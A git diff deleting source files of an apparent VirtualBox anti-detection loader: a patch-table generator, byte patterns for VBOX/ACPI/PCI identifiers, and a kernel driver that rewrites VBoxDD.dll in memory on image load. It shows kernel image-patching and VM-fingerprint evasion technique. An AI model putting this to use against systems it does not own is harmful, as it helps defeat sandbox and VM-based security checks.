- (CONST PBYTE)Pattern, DllVirtualSize - (Pattern - DllBase),
- (CONST PBYTE)PCIBEEF_PATTERN, sizeof(PCIBEEF_PATTERN));
- if (Pattern) {
- DataBlocks[c].VirtualOffset = (ULONG)(1 + Pattern - DllBase);
- DataBlocks[c].DataLength = sizeof(HWID_PATCH_VIDEO_2);
- RtlCopyMemory(DataBlocks[c].Data, HWID_PATCH_VIDEO_2, DataBlocks[c].DataLength);
- RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
- _strcpy(LogBuffer, TEXT("BEEF\t\t0x"));
- ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer));
- cuiPrintText(LogBuffer, TRUE);
- c += 1;
- d += 1;
- if (d > MAX_HWID_BLOCKS_DEEP) {
- cuiPrintText(TEXT("\r\nVPG: Maximum hwid blocks deep, abort scan.\r\n"), TRUE);
- break;
- }
- }
- else {
- break;
- }
- Pattern++;
- } while (DllVirtualSize - (Pattern - DllBase) > 0);
-
- //
- // CAFE
- //
- RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
- Pattern = FindPattern(
- (CONST PBYTE)DllBase, DllVirtualSize,
- (CONST PBYTE)PCICAFE_PATTERN, sizeof(PCICAFE_PATTERN));
- if (Pattern) {
- DataBlocks[c].VirtualOffset = (ULONG)(1 + Pattern - DllBase);
- DataBlocks[c].DataLength = sizeof(HWID_PATCH);
- RtlCopyMemory(DataBlocks[c].Data, HWID_PATCH, DataBlocks[c].DataLength);
- _strcpy(LogBuffer, TEXT("CAFE\t\t0x"));
- ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer));
- c += 1;
- }
- else {
- _strcpy(LogBuffer, TEXT("\tPattern CAFE not found"));
- }
- cuiPrintText(LogBuffer, TRUE);
-
- if (SaveTable(DataBlocks, TEXT("\\output.bin"), c))
- uResult = 0;
- else
- uResult = (UINT)-2;
-
- } while (cond);
-
- if (usFileName.Buffer != NULL) {
- RtlFreeUnicodeString(&usFileName);
- }
-
- if (DllBase != NULL)
- NtUnmapViewOfSection(NtCurrentProcess(), DllBase);
-
- if (fh != NULL)
- NtClose(fh);
-
- if (sec != NULL)
- NtClose(sec);
-
- if (DataBlocks != NULL)
- RtlFreeHeap(GetProcessHeap(), 0, DataBlocks);
-
- return uResult;
-}
-
-/*
-* KasumiMain
-*
-* Purpose:
-*
-* Program entry point.
-*
-*/
-void KasumiMain(
- VOID
-)
-{
- BOOL cond = FALSE;
- UINT uResult = 0;
-
- __security_init_cookie();
-
- do {
-
- cuiInitialize(FALSE, NULL);
-
- SetConsoleTitle(T_PROGRAMTITLE);
-
- cuiPrintText(T_PROGRAMTITLE, TRUE);
-
- uResult = ProcessInputFile(GetCommandLine());
-
- switch (uResult) {
-
- case (UINT)-2:
- cuiPrintText(T_FILEOUTFAIL, TRUE);
-
- case (UINT)-1:
- cuiPrintText(TEXT("\r\nInput file not found"), TRUE);
- break;
-
- case 0: //success
- cuiPrintText(TEXT("\r\nOutput file generated"), TRUE);
- break;
-
- default:
- cuiPrintText(T_FILEINFAIL, FALSE);
- break;
- }
-
- } while (cond);
-
- ExitProcess(0);
-}
diff --git a/Source/Kasumi/VBoxPatchGen/patterns.h b/Source/Kasumi/VBoxPatchGen/patterns.h
deleted file mode 100644
index 3d35f03..0000000
--- a/Source/Kasumi/VBoxPatchGen/patterns.h
+++ /dev/null
@@ -1,132 +0,0 @@
-/*******************************************************************************
-*
-* (C) COPYRIGHT AUTHORS, 2017 - 2019
-*
-* TITLE: PATTERNS.H
-*
-* VERSION: 1.20
-*
-* DATE: 04 Jan 2019
-*
-* Search patterns and patches header file.
-*
-* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
-* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
-* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
-* PARTICULAR PURPOSE.
-*
-*******************************************************************************/
-
-#pragma once
-
-//patches
-
-static const unsigned char VBOX_PATCH[] = { 0x51, 0x52 };
-
-static const unsigned char JUSTVIRTUALBOX_PATCH[] = {
- 0x4D, 0x61, 0x67, 0x69, 0x63, 0x61, 0x6C, 0x52 };
-
-static const unsigned char CONFIGURATION_PATCH[] = {
- 0x44, 0x73, 0x64, 0x74, 0x46, 0x69, 0x6C, 0x65, 0x50, 0x61, 0x74, 0x68, 0x00, 0x53,
- 0x73, 0x64, 0x74, 0x46, 0x69, 0x6C, 0x65, 0x50, 0x61, 0x74, 0x68, 0x00, 0x00 };
-
-static const unsigned char HWID_PATCH_VIDEO_1[] = { 0xDE, 0x10 };
-
-static const unsigned char HWID_PATCH_VIDEO_2[] = { 0xED, 0x1C };
-
-static const unsigned char HWID_PATCH[] = { 0xCA, 0xC0 };
-
-//patterns
-
-static const unsigned char FACP_PATTERN[] = {
- 0xC7, 0x44, 0x24, 0x30, 0x56, 0x42, 0x4F, 0x58,
- 0x89, 0x45, 0x90, 0xC7, 0x44, 0x24, 0x34, 0x46,
- 0x41, 0x43, 0x50 };
-
-static const unsigned char RSDT_PATTERN[] = {
- 0xC7, 0x47, 0x10, 0x56, 0x42, 0x4F, 0x58, 0xC7,
- 0x47, 0x14, 0x52, 0x53, 0x44, 0x54
-};
-
-static const unsigned char XSDT_PATTERN[] = {
- 0xC7, 0x43, 0x10, 0x56, 0x42, 0x4F, 0x58, 0xC7,
- 0x43, 0x14, 0x58, 0x53, 0x44, 0x54
-};
-
-static const unsigned char APIC_PATTERN[] = {
- 0xC7, 0x40, 0x10, 0x56, 0x42, 0x4F, 0x58, 0xC7,
- 0x40, 0x14, 0x41, 0x50, 0x49, 0x43
-};
-
-static const unsigned char HPET_PATTERN[] = {
- 0xC7, 0x45, 0xD0, 0x56, 0x42, 0x4F, 0x58, 0x32,
- 0xD2, 0xC7, 0x45, 0xD4, 0x48, 0x50, 0x45, 0x54
-};
-
-static const unsigned char MCFG_PATTERN[] =
{
- 0xC7, 0x45, 0xD0, 0x56, 0x42, 0x4F, 0x58, 0xFE,
- 0xC8, 0xC7, 0x45, 0xD4, 0x4D, 0x43, 0x46, 0x47
-};
-
-static const unsigned char VBOXCPU_PATTERN[] = {
- 0x48, 0xB8, 0x56, 0x42, 0x4F, 0x58, 0x43, 0x50,
- 0x55, 0x20
-};
-
-static const unsigned char JUSTVBOX_PATTERN[] = {
- 0x41, 0xC7, 0x01, 0x56, 0x42, 0x4F, 0x58, 0x66,
- 0xC7, 0x81, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01
-};
-
-static const unsigned char JUSTVIRTUALBOX_PATTERN[] = {
- 0x56, 0x69, 0x72, 0x74, 0x75, 0x61, 0x6C, 0x42,
- 0x6F, 0x78, 0x00
-};
-
-static const unsigned char VIRTUALBOX2020_PATTERN[] = {
- 0x56, 0x69, 0x72, 0x74, 0x75, 0x61, 0x6C, 0x42,
- 0x6F, 0x78, 0x20, 0x20, 0x00
-};
-
-static const unsigned char VIRTUALBOXGIM_PATTERN[] = {
- 0x56, 0x69, 0x72, 0x74, 0x75, 0x61, 0x6C, 0x42,
- 0x6F, 0x78, 0x20, 0x47, 0x49, 0x4D, 0x20, 0x44,
- 0x65, 0x76, 0x69, 0x63, 0x65, 0x00
-};
-
-static const unsigned char VIRTUALBOXVMM_PATTERN[] = {
- 0x56, 0x69, 0x72, 0x74, 0x75, 0x61, 0x6C, 0x42,
- 0x6F, 0x78, 0x20, 0x56, 0x4D, 0x4D, 0x20, 0x44,
- 0x65, 0x76, 0x69, 0x63, 0x65, 0x0A, 0x00
-};
-
-static const unsigned char CFGSTRINGS_PATTERN[] = {
- 0x50, 0x61, 0x72, 0x61, 0x6C, 0x6C, 0x65, 0x6C,
- 0x30, 0x49, 0x72, 0x71, 0x00, 0x50, 0x61, 0x72,
- 0x61, 0x6C, 0x6C, 0x65, 0x6C, 0x31, 0x49, 0x72,
- 0x71, 0x00, 0x00
-};
- /*
-static const unsigned char CDROMVBOX_PATTERN[] = {
- 0x31, 0x2E, 0x30, 0x00, 0x43, 0x44, 0x2D, 0x52,
- 0x4F, 0x4D, 0x00, 0x00, 0x56, 0x42, 0x4F, 0x58,
- 0x00
-}; */
-
-static const unsigned char PCI80EE_PATTERN[] = {
- 0xB8, 0xEE, 0x80, 0x00, 0x00
-};
-
-static const unsigned char PCIBEEF_PATTERN[] = {
- 0xB8, 0xEF, 0xBE, 0x00, 0x00
-};
-
-static const unsigned char PCICAFE_PATTERN[] = {
- 0xB8, 0xFE, 0xCA, 0x00, 0x00
-};
-
-static const unsigned char HVID_PATTERN[] = {
- 0xC7, 0x40, 0xE8, 0x56, 0x42, 0x6F, 0x78, 0xC7,
- 0x40, 0xEC, 0x56, 0x42, 0x6F, 0x78, 0x48, 0xC7,
- 0x40, 0xF0, 0x56, 0x42, 0x6F, 0x78
-};
diff --git a/Source/Tsugumi/Tsugumi.sln b/Source/Tsugumi/Tsugumi.sln
deleted file mode 100644
index f73d58c..0000000
--- a/Source/Tsugumi/Tsugumi.sln
+++ /dev/null
@@ -1,28 +0,0 @@
-
-Microsoft Visual Studio Solution File, Format Version 12.00
-# Visual Studio 14
-VisualStudioVersion = 14.0.25420.1
-MinimumVisualStudioVersion = 10.0.40219.1
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Tsugumi", "Tsugumi.vcxproj", "{3D8146DE-8064-46C0-9E70-CEEC357B2290}"
-EndProject
-Global
- GlobalSection(SolutionConfigurationPlatforms) = preSolution
- Debug|x64 = Debug|x64
- Release|x64 = Release|x64
- ReleaseSigned|x64 = ReleaseSigned|x64
- EndGlobalSection
- GlobalSection(ProjectConfigurationPlatforms) = postSolution
- {3D8146DE-8064-46C0-9E70-CEEC357B2290}.Debug|x64.ActiveCfg = Debug|x64
- {3D8146DE-8064-46C0-9E70-CEEC357B2290}.Debug|x64.Build.0 = Debug|x64
- {3D8146DE-8064-46C0-9E70-CEEC357B2290}.Debug|x64.Deploy.0 = Debug|x64
- {3D8146DE-8064-46C0-9E70-CEEC357B2290}.Release|x64.ActiveCfg = Release|x64
- {3D8146DE-8064-46C0-9E70-CEEC357B2290}.Release|x64.Build.0 = Release|x64
- {3D8146DE-8064-46C0-9E70-CEEC357B2290}.Release|x64.Deploy.0 = Release|x64
- {3D8146DE-8064-46C0-9E70-CEEC357B2290}.ReleaseSigned|x64.ActiveCfg = ReleaseSigned|x64
- {3D8146DE-8064-46C0-9E70-CEEC357B2290}.ReleaseSigned|x64.Build.0 = ReleaseSigned|x64
- {3D8146DE-8064-46C0-9E70-CEEC357B2290}.ReleaseSigned|x64.Deploy.0 = ReleaseSigned|x64
- EndGlobalSection
- GlobalSection(SolutionProperties) = preSolution
- HideSolutionNode = FALSE
- EndGlobalSection
-EndGlobal
diff --git a/Source/Tsugumi/Tsugumi.vcxproj b/Source/Tsugumi/Tsugumi.vcxproj
deleted file mode 100644
index e2b9632..0000000
--- a/Source/Tsugumi/Tsugumi.vcxproj
+++ /dev/null
@@ -1,191 +0,0 @@ - - - - - DebugBuild - x64 - - - ReleaseSigned - x64 - - - Debug - x64 - - - Release - x64 - - - - {3D8146DE-8064-46C0-9E70-CEEC357B2290} - {1bc93793-694f-48fe-9372-81e2b05556fd} - v4.5 - 12.0 - Debug - Win32 - Tsugumi - 8.1 - Tsugumi - - - - Windowsv6.3 - true - WindowsKernelModeDriver8.1 - Driver - KMDF - Universal - - - Windowsv6.3 - false - WindowsKernelModeDriver8.1 - Driver - KMDF - Universal - true - - - Windowsv6.3 - false - WindowsKernelModeDriver8.1 - Driver - KMDF - Universal - true - - - Windowsv6.3 - false - WindowsKernelModeDriver8.1 - Driver - KMDF - Universal - true - - - - - - - - - - - DbgengKernelDebugger - AllRules.ruleset - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - - - DbgengKernelDebugger - AllRules.ruleset - true - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - - - DbgengKernelDebugger - AllRules.ruleset - true - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - - - DbgengKernelDebugger - AllRules.ruleset - true - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - - - - false - true - Speed - false - true - All - true - CompileAsC - true - true - - - false - false - true - true - DriverEntry - false - - - - - false - true - Speed - false - true - All - true - CompileAsC - true - true - _SIGNED_BUILD;_DEBUGMSG;%(PreprocessorDefinitions) - - - false - true - true - true - DriverEntry - false - /INTEGRITYCHECK %(AdditionalOptions) - - - \Certs\SignTsugumi64.cmd .\output\$(Platform)\$(Configuration)\Tsugumi.sys - - - - - false - true - Speed - false - true - All - true - CompileAsC - true - true - _DEBUGMSG;%(PreprocessorDefinitions) - - - false - false - true - true - DriverEntry - false - - - - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/Source/Tsugumi/Tsugumi.vcxproj.user b/Source/Tsugumi/Tsugumi.vcxproj.user deleted file mode 100644 index fb6baad..0000000 
--- a/Source/Tsugumi/Tsugumi.vcxproj.user +++ /dev/null @@ -1,12 +0,0 @@ - - - - Off - - - Off - - - Off - - \ No newline at end of file diff --git a/Source/Tsugumi/main.c b/Source/Tsugumi/main.c deleted file mode 100644 index 85e2d3c..0000000 --- a/Source/Tsugumi/main.c +++ /dev/null 
@@ -1,637 +0,0 @@
-/*******************************************************************************
-*
-* (C) COPYRIGHT AUTHORS, 2014 - 2017
-*
-* TITLE: MAIN.C
-*
-* VERSION: 1.82
-*
-* DATE: 20 Apr 2017
-*
-* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
-* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
-* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
-* PARTICULAR PURPOSE.
-*
-*******************************************************************************/
-#include
-#include "main.h"
-
-#pragma warning(disable: 6102) //"Using %s from failed call at line %s"
-
-VBOX_PATCH g_VBoxDD;
-
-// Notify flag
-BOOLEAN g_NotifySet;
-
-// Data buffer
-static const WCHAR DDname[] = L"VBoxDD.dll";
-
-
-/*
-* TsmiHandleMemWrite
-*
-* Purpose:
-*
-* Patch vbox dll in memory.
-*
-* Warning: If compiled not in ReleaseSigned configuration this function is a
-* potential BSOD-generator due to nonstandard way of loading, take care with patch offsets.
-*
-*/
-NTSTATUS TsmiHandleMemWrite(
- _In_ PVOID SrcAddress,
- _In_ PVOID DestAddress,
- _In_ ULONG Size
-)
-{
- PMDL mdl;
- NTSTATUS status = STATUS_SUCCESS;
-
- PAGED_CODE();
-
- mdl = IoAllocateMdl(DestAddress, Size, FALSE, FALSE, NULL);
- if (mdl == NULL) {
-#ifdef _DEBUGMSG
- DbgPrint("[TSMI] Failed to create MDL at write\n");
-#endif
- return STATUS_INSUFFICIENT_RESOURCES;
- }
-
-#ifdef _SIGNED_BUILD
- __try {
-#endif //_SIGNED_BUILD
-
- if (DestAddress >= MmSystemRangeStart)
- if (!MmIsAddressValid(DestAddress)) {
-#ifdef _DEBUGMSG
- DbgPrint("[TSMI] Invalid address\n");
-#endif //_DEBUGMSG
- return STATUS_ACCESS_VIOLATION;
- }
- MmProbeAndLockPages(mdl, KernelMode, IoReadAccess);
- DestAddress = MmGetSystemAddressForMdlSafe(mdl, HighPagePriority);
- if (DestAddress != NULL) {
- status = MmProtectMdlSystemAddress(mdl, PAGE_EXECUTE_READWRITE);
- __movsb((PUCHAR)DestAddress, (const UCHAR *)SrcAddress, Size);
- MmUnmapLockedPages(DestAddress, mdl);
- MmUnlockPages(mdl);
- }
- else {
- status = STATUS_ACCESS_VIOLATION;
- }
-
-#ifdef _SIGNED_BUILD
- }
- __except (EXCEPTION_EXECUTE_HANDLER) {
- status = STATUS_ACCESS_VIOLATION;
-#ifdef _DEBUGMSG
- DbgPrint("[TSMI] MmProbeAndLockPages failed at write DestAddress = %p\n", DestAddress);
-#endif //_DEBUGMSG
- }
-#endif //_SIGNED_BUILD
-
- IoFreeMdl(mdl);
- return status;
-}
-
-/*
-* TsmiPatchImage
-*
-* Purpose:
-*
-* Iterate through patch chains and apply them all.
-*
-*/
-NTSTATUS TsmiPatchImage(
- _In_ VBOX_PATCH *PatchInfo,
- _In_ PIMAGE_INFO ImageInfo
-)
-{
- NTSTATUS ntStatus = STATUS_UNSUCCESSFUL;
- PBINARY_PATCH_BLOCK Chains;
- PKEY_VALUE_PARTIAL_INFORMATION PatchChains;
- ULONG l = 0;
-
- PAGED_CODE();
-
- if ((ImageInfo == NULL) || (PatchInfo == NULL))
- return ntStatus;
-
- KeWaitForSingleObject(&PatchInfo->Lock, Executive, KernelMode, FALSE, NULL);
-
- PatchChains = PatchInfo->Chains;
-
- if (PatchChains != NULL) {
- l = 0;
- Chains = (PBINARY_PATCH_BLOCK)&PatchChains->Data[0];
- while (l + BLOCK_DATA_OFFSET < PatchChains->DataLength) {
- if (Chains->DataLength != 0) {
- if ((Chains->VirtualOffset < ImageInfo->ImageSize) &&
- (Chains->VirtualOffset + Chains->DataLength < ImageInfo->ImageSize))
- {
- ntStatus = TsmiHandleMemWrite(Chains->Data, (PVOID)((ULONG_PTR)ImageInfo->ImageBase + Chains->VirtualOffset), Chains->DataLength);
- }
- }
- l += BLOCK_DATA_OFFSET + Chains->DataLength;
- Chains = (PBINARY_PATCH_BLOCK)((ULONG_PTR)Chains + BLOCK_DATA_OFFSET + Chains->DataLength);
- }
-
-#ifdef _DEBUGMSG
- DbgPrint("[TSMI] Image patch complete\n");
-#endif //_DEBUGMSG
- }
-
- KeReleaseMutex(&PatchInfo->Lock, FALSE);
-
- return ntStatus;
-}
-
-/*
-* TsmiPsImageHandler
-*
-* Purpose:
-*
-* Notify to catch VirtualBox dlls loading.
-*
-*/
-VOID TsmiPsImageHandler(
- _In_ PUNICODE_STRING FullImageName,
- _In_ HANDLE ProcessId,
- _In_ PIMAGE_INFO ImageInfo
-)
-{
- ULONG c, l = 0;
-
- PAGED_CODE();
-
- if ((FullImageName == NULL) || (ImageInfo == NULL) || (PsGetCurrentProcessId() != ProcessId))
- return;
-
- if ((FullImageName->Buffer == NULL) || (FullImageName->Length == 0))
- return;
-
- for (c = 0; c < (ULONG)FullImageName->Length / sizeof(WCHAR); c++)
- if (FullImageName->Buffer[c] == '\\')
- l = c + 1;
-
- //
- // Patch VBoxDD image.
- //
- if (_wcsnicmp(&FullImageName->Buffer[l], DDname, wcslen(DDname)) == 0) {
- if (NT_SUCCESS(TsmiPatchImage(&g_VBoxDD, ImageInfo))) {
-#ifdef _DEBUGMSG
- DbgPrint("[TSMI] DD patched\n");
-#endif
- }
- }
-}
-
-/*
-* TsmiListPatchChains
-*
-* Purpose:
-*
-* Output patch chains. DebugMsg only build.
-*
-*/
-VOID TsmiListPatchChains(
- _In_ KEY_VALUE_PARTIAL_INFORMATION *PatchChains
-)
-{
- ULONG l = 0;
- PBINARY_PATCH_BLOCK Chains;
-
- PAGED_CODE();
-
- DbgPrint("[TSMI] Patch chains -> %p\n", PatchChains);
-
- if (PatchChains == NULL)
- return;
-
- l = 0;
- Chains = (PBINARY_PATCH_BLOCK)&PatchChains->Data[0];
-
- DbgPrint("[TSMI] Chains->DataLength=%lx\n", PatchChains->DataLength);
-
- while (l + BLOCK_DATA_OFFSET < PatchChains->DataLength) {
- if (Chains->DataLength != 0) {
- DbgPrint("[TSMI] Chain->Offset: %lx, Chain->DataLength: %lx\n", Chains->VirtualOffset, Chains->DataLength);
- }
- l += BLOCK_DATA_OFFSET + Chains->DataLength;
- Chains = (PBINARY_PATCH_BLOCK)((ULONG_PTR)Chains + BLOCK_DATA_OFFSET + Chains->DataLength);
- }
-}
-
-/*
-* TsmiReadPatchChains
-*
-* Purpose:
-*
-* Read specified chains value from registry.
-*
-*/
-NTSTATUS TsmiReadPatchChains(
- _In_ HANDLE sKey,
- _In_ PUNICODE_STRING ParamName,
- _In_ VBOX_PATCH *PatchInfo
-)
-{
- KEY_VALUE_PARTIAL_INFORMATION keyinfo;
- ULONG ChainsLength = 0, bytesIO;
- NTSTATUS status;
-
- PAGED_CODE();
-
- if (sKey == NULL)
- return STATUS_INVALID_PARAMETER_1;
-
- if (ParamName == NULL)
- return STATUS_INVALID_PARAMETER_2;
-
- if (PatchInfo == NULL)
- return STATUS_INVALID_PARAMETER_3;
-
- status = ZwQueryValueKey(sKey, ParamName, KeyValuePartialInformation, &keyinfo, sizeof(KEY_VALUE_PARTIAL_INFORMATION), &ChainsLength);
- if (NT_SUCCESS(status)) {
- return STATUS_BUFFER_TOO_SMALL; // The key value is empty.
It should not success with zero-length buffer if there are some data;
- }
-
- if ((status != STATUS_BUFFER_TOO_SMALL) && (status != STATUS_BUFFER_OVERFLOW)) {
- return status;
- }
-
- //
- // Allocate buffer for data with given size
- //
- PatchInfo->Chains = (PKEY_VALUE_PARTIAL_INFORMATION)ExAllocatePoolWithTagPriority(PagedPool,
- (SIZE_T)ChainsLength, TSUGUMI_TAG, NormalPoolPriority);
- if (PatchInfo->Chains == NULL)
- return STATUS_INSUFFICIENT_RESOURCES;
-
-
-#ifdef _DEBUGMSG
- DbgPrint("[TSMI] ChainsLength=%lx\n", ChainsLength);
-#endif //_DEBUGMSG
-
- RtlSecureZeroMemory(PatchInfo->Chains, ChainsLength);
- status = ZwQueryValueKey(sKey, ParamName, KeyValuePartialInformation, PatchInfo->Chains, ChainsLength, &bytesIO);
- if (NT_SUCCESS(status)) {
- PatchInfo->ChainsLength = ChainsLength;
-#ifdef _DEBUGMSG
- TsmiListPatchChains(PatchInfo->Chains);
-#endif //_DEBUGMSG
- }
-
- return status;
-}
-
-/*
-* TsmiCopyPatchChainsData
-*
-* Purpose:
-*
-* Copy/Refresh patch chains data to global variable.
-*
-*/
-VOID TsmiCopyPatchChainsData(
- _In_ VBOX_PATCH *Src,
- _In_ VBOX_PATCH *Dst
-)
-{
- PAGED_CODE();
-
- if ((Src == NULL) || (Dst == NULL))
- return;
-
- if ((Src->Chains == NULL) || (Src->ChainsLength == 0))
- return;
-
- KeWaitForSingleObject(&Dst->Lock, Executive, KernelMode, FALSE, NULL);
-
- if (Dst->Chains != NULL) {
- ExFreePoolWithTag(Dst->Chains, TSUGUMI_TAG);
- Dst->Chains = NULL;
- Dst->ChainsLength = 0;
- }
-
- Dst->Chains = Src->Chains;
- Dst->ChainsLength = Src->ChainsLength;
-
- KeReleaseMutex(&Dst->Lock, FALSE);
-}
-
-/*
-* TsmiLoadParameters
-*
-* Purpose:
-*
-* Read parameters from registry.
-* -*/ -NTSTATUS TsmiLoadParameters( - VOID -) -{ - UCHAR cond = 0; - HANDLE hKey = NULL; - NTSTATUS status = STATUS_UNSUCCESSFUL; - UNICODE_STRING uStr; - OBJECT_ATTRIBUTES ObjectAttributes; - VBOX_PATCH tempPatch; - - PAGED_CODE(); - - RtlInitUnicodeString(&uStr, TSUGUMI_PARAMS); - InitializeObjectAttributes(&ObjectAttributes, &uStr, OBJ_KERNEL_HANDLE | OBJ_CASE_INSENSITIVE, NULL, NULL); - - status = ZwOpenKey(&hKey, KEY_READ, &ObjectAttributes); - if (!NT_SUCCESS(status)) - return status; - - do { - tempPatch.Chains = NULL; - tempPatch.ChainsLength = 0; - - RtlInitUnicodeString(&uStr, DDname); - status = TsmiReadPatchChains(hKey, &uStr, &tempPatch); - if (NT_SUCCESS(status)) { - TsmiCopyPatchChainsData(&tempPatch, &g_VBoxDD); - } - else { - // VBoxDD must be always patched so return error if no patch data found. - status = STATUS_UNSUCCESSFUL; - break; - } - - } while (cond); - - ZwClose(hKey); - return status; -} - -/* -* DevioctlDispatch -* -* Purpose: -* -* IRP_MJ_DEVICE_CONTROL dispatch. 
-* -*/ -NTSTATUS DevioctlDispatch( - _In_ struct _DEVICE_OBJECT *DeviceObject, - _Inout_ struct _IRP *Irp -) -{ - NTSTATUS status = STATUS_SUCCESS; - PIO_STACK_LOCATION stack; - ULONG_PTR bytesIO = 0; - - UNREFERENCED_PARAMETER(DeviceObject); - - PAGED_CODE(); - - stack = IoGetCurrentIrpStackLocation(Irp); - - if (stack != NULL) { - switch (stack->Parameters.DeviceIoControl.IoControlCode) { - case TSUGUMI_IOCTL_REFRESH_LIST: - -#ifdef _DEBUGMSG - DbgPrint("[TSMI] DevioctlDispatch:TSUGUMI_IOCTL_REFRESH_LIST"); -#endif //_DEBUGMSG - - status = TsmiLoadParameters(); - if (g_NotifySet == FALSE) { - if (NT_SUCCESS(status)) { - status = PsSetLoadImageNotifyRoutine(TsmiPsImageHandler); - if (NT_SUCCESS(status)) { - g_NotifySet = TRUE; - -#ifdef _DEBUGMSG - DbgPrint("[TSMI] DevioctlDispatch:NotifySet=%lx\n", g_NotifySet); -#endif //_DEBUGMSG - - } - } - } - -#ifdef _DEBUGMSG - else { - DbgPrint("[TSMI] DevioctlDispatch:Notify already installed\n"); - } -#endif //_DEBUGMSG - - bytesIO = g_NotifySet; - break; - - case TSUGUMI_IOCTL_MONITOR_STOP: - - bytesIO = 0; - -#ifdef _DEBUGMSG - DbgPrint("[TSMI] DevioctlDispatch:TSUGUMI_IOCTL_MONITOR_STOP"); -#endif //_DEBUGMSG - - - if (g_NotifySet) { - status = PsRemoveLoadImageNotifyRoutine(TsmiPsImageHandler); - if (NT_SUCCESS(status)) { - g_NotifySet = FALSE; -#ifdef _DEBUGMSG - DbgPrint("[TSMI] DevioctlDispatch:NotifySet=%lx\n", g_NotifySet); -#endif //_DEBUGMSG - bytesIO = 1; - } - } - break; - - default: - status = STATUS_INVALID_PARAMETER; - }; - } - else { - status = STATUS_INTERNAL_ERROR; - } - - Irp->IoStatus.Status = status; - Irp->IoStatus.Information = bytesIO; - IoCompleteRequest(Irp, IO_NO_INCREMENT); - return status; -} - -/* -* UnsupportedDispatch -* -* Purpose: -* -* Unused IRP_MJ_* dispatch. 
-* -*/ -NTSTATUS UnsupportedDispatch( - _In_ struct _DEVICE_OBJECT *DeviceObject, - _Inout_ struct _IRP *Irp -) -{ - UNREFERENCED_PARAMETER(DeviceObject); - - PAGED_CODE(); - - Irp->IoStatus.Status = STATUS_NOT_SUPPORTED; - Irp->IoStatus.Information = 0; - IoCompleteRequest(Irp, IO_NO_INCREMENT); - return STATUS_NOT_SUPPORTED; -} - -/* -* CreateCloseDispatch -* -* Purpose: -* -* IRP_MJ_CREATE/IRP_MJ_CLOSE dispatch. -* -*/ -NTSTATUS CreateCloseDispatch( - _In_ struct _DEVICE_OBJECT *DeviceObject, - _Inout_ struct _IRP *Irp -) -{ - UNREFERENCED_PARAMETER(DeviceObject); - - PAGED_CODE(); - - Irp->IoStatus.Status = STATUS_SUCCESS; - Irp->IoStatus.Information = 0; - IoCompleteRequest(Irp, IO_NO_INCREMENT); - return STATUS_SUCCESS; -} - -/* -* DriverUnload -* -* Purpose: -* -* Driver unload procedure. -* -*/ -VOID DriverUnload( - _In_ struct _DRIVER_OBJECT *DriverObject -) -{ - PAGED_CODE(); - - UNICODE_STRING SymLink; - -#ifdef _DEBUGMSG - DbgPrint("[TSMI] Unload, DrvObj = %p\n", DriverObject); -#endif - - if (g_NotifySet) { - PsRemoveLoadImageNotifyRoutine(TsmiPsImageHandler); - } - - KeWaitForSingleObject(&g_VBoxDD.Lock, Executive, KernelMode, FALSE, NULL); - - if (g_VBoxDD.Chains) { - ExFreePoolWithTag(g_VBoxDD.Chains, TSUGUMI_TAG); - g_VBoxDD.Chains = NULL; - g_VBoxDD.ChainsLength = 0; - } - - KeReleaseMutex(&g_VBoxDD.Lock, FALSE); - - RtlInitUnicodeString(&SymLink, TSUGUMI_SYM_LINK); - IoDeleteSymbolicLink(&SymLink); - IoDeleteDevice(DriverObject->DeviceObject); -} - - -/* -* DriverInitialize -* -* Purpose: -* -* Driver main. 
-* -*/ -NTSTATUS DriverInitialize( - _In_ struct _DRIVER_OBJECT *DriverObject, - _In_ PUNICODE_STRING RegistryPath -) -{ - NTSTATUS status; - UNICODE_STRING SymLink, DevName; - PDEVICE_OBJECT devobj; - ULONG t; - - //RegistryPath is unused - UNREFERENCED_PARAMETER(RegistryPath); - - g_NotifySet = FALSE; - - g_VBoxDD.Chains = NULL; - g_VBoxDD.ChainsLength = 0; - KeInitializeMutex(&g_VBoxDD.Lock, 0); - - RtlInitUnicodeString(&DevName, TSUGUMI_DEV_OBJECT); - status = IoCreateDevice(DriverObject, 0, &DevName, FILE_DEVICE_UNKNOWN, FILE_DEVICE_SECURE_OPEN, TRUE, &devobj); - if (!NT_SUCCESS(status)) { - return status; - } - - RtlInitUnicodeString(&SymLink, TSUGUMI_SYM_LINK); - status = IoCreateSymbolicLink(&SymLink, &DevName); - if (!NT_SUCCESS(status)) { - IoDeleteDevice(devobj); - return status; - } - - devobj->Flags |= DO_BUFFERED_IO; - for (t = 0; t <= IRP_MJ_MAXIMUM_FUNCTION; t++) - DriverObject->MajorFunction[t] = &UnsupportedDispatch; - - DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = &DevioctlDispatch; - DriverObject->MajorFunction[IRP_MJ_CREATE] = &CreateCloseDispatch; - DriverObject->MajorFunction[IRP_MJ_CLOSE] = &CreateCloseDispatch; - -#ifndef _SIGNED_BUILD - DriverObject->DriverUnload = NULL; - devobj->Flags &= ~DO_DEVICE_INITIALIZING; -#else - DriverObject->DriverUnload = &DriverUnload; - status = TsmiLoadParameters(); - if (NT_SUCCESS(status)) { - status = PsSetLoadImageNotifyRoutine(TsmiPsImageHandler); - if (NT_SUCCESS(status)) { - g_NotifySet = TRUE; - } - } -#endif - return STATUS_SUCCESS; -} - -/* -* DriverEntry -* -* Purpose: -* -* Tsugumi entry point. 
